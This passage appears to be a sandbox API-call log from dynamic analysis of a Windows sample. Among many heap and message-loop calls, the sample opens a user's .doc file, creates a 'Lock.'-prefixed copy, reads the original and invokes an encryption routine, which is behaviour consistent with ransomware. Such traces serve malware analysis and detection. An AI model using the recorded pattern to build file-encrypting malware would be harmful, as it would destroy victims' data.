hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.233] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/1jNOs4dsiatFwtPt-_j2.doc" (normalized: "c:\\users\\fd1hvy\\documents\\1jnos4dsiatfwtpt-_j2.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0259.233] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.233] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0259.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0259.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.234] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0259.235] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.1jNOs4dsiatFwtPt-_j2.doc" (normalized: "c:\\users\\fd1hvy\\documents\\lock.1jnos4dsiatfwtpt-_j2.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0259.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0259.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0259.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.240] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0259.240] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0xda0a, lpOverlapped=0x0) returned 1 [0259.243] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0259.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0259.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2f14010 [0259.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2f21a28 [0259.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2f14010 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0259.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.249] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2f14010 [0259.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550e8 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55108 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2f2f440 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, 